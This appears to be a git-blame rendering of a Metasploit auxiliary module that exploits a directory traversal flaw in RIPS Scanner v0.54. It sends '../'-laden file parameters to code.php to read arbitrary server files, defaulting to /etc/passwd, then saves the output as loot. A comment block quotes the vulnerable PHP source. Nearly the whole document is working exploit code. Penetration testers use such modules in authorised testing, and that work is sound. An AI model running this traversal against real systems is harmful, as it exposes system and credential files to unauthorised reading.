2015-03-27 08:08:43 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'RIPS Scanner Directory Traversal',
|
|
|
|
'Description' => %q{
|
2015-04-03 20:27:28 +00:00
|
|
|
This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54,
|
|
|
|
allowing to read arbitrary files with the web server privileges.
|
2015-03-27 08:08:43 +00:00
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
2015-04-03 20:27:28 +00:00
|
|
|
['EDB', '18660'],
|
2015-03-27 08:08:43 +00:00
|
|
|
['URL', 'http://codesec.blogspot.com.br/2015/03/rips-scanner-v-054-local-file-include.html']
|
|
|
|
],
|
2015-04-03 20:27:28 +00:00
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'localh0t', # Vulnerability discovery
|
|
|
|
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
|
|
|
|
],
|
2015-03-27 08:08:43 +00:00
|
|
|
'License' => MSF_LICENSE
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(80),
|
|
|
|
OptString.new('TARGETURI', [ true, "The URI path to the web application", "/rips/"]),
|
|
|
|
OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]),
|
2015-04-03 20:33:27 +00:00
|
|
|
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 5 ])
|
2015-03-27 08:08:43 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
2015-04-03 20:33:27 +00:00
|
|
|
traversal = "../" * datastore['DEPTH']
|
2015-03-27 08:08:43 +00:00
|
|
|
filename = datastore['FILEPATH']
|
|
|
|
filename = filename[1, filename.length] if filename =~ /^\//
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => normalize_uri(target_uri.path, 'windows', 'code.php'),
|
|
|
|
'vars_get' =>
|
|
|
|
{
|
|
|
|
'file' => "#{traversal}#{filename}"
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
if res &&
|
|
|
|
res.code == 200 &&
|
|
|
|
res.headers.include?('Set-Cookie') &&
|
|
|
|
res.body.length > 304
|
|
|
|
|
|
|
|
html = Nokogiri::HTML(res.body)
|
|
|
|
html_clean = html.search('.codeline').text
|
|
|
|
print_line("#{html_clean}")
|
|
|
|
|
|
|
|
fname = datastore['FILEPATH']
|
|
|
|
|
|
|
|
path = store_loot(
|
|
|
|
'rips.traversal',
|
|
|
|
'text/plain',
|
|
|
|
ip,
|
|
|
|
html_clean,
|
|
|
|
fname
|
|
|
|
)
|
|
|
|
|
|
|
|
print_good("#{peer} - File saved in: #{path}")
|
|
|
|
else
|
|
|
|
print_error("#{peer} - Nothing was downloaded")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
=begin
|
|
|
|
102 $file = $_GET['file'];
|
|
|
|
103 $marklines = explode(',', $_GET['lines']);
|
|
|
|
104
|
|
|
|
105
|
|
|
|
106 if(!empty($file))
|
|
|
|
107 {
|
|
|
|
108 $lines = file($file);
|
|
|
|
109
|
|
|
|
110 // place line numbers in extra table for more elegant copy/paste without line numbers
|
|
|
|
111 echo '<tr><td><table>';
|
|
|
|
112 for($i=1, $max=count($lines); $i<=$max;$i++)
|
|
|
|
113 echo "<tr><td class=\"linenrcolumn\"><span class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';
|
|
|
|
114 echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
|
|
|
|
115
|
|
|
|
116 $in_comment = false;
|
|
|
|
117 for($i=0; $i<$max; $i++)
|
|
|
|
118 {
|
|
|
|
119 $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
|
|
|
|
120 }
|
|
|
|
121 }
|
|
|
|
=end
|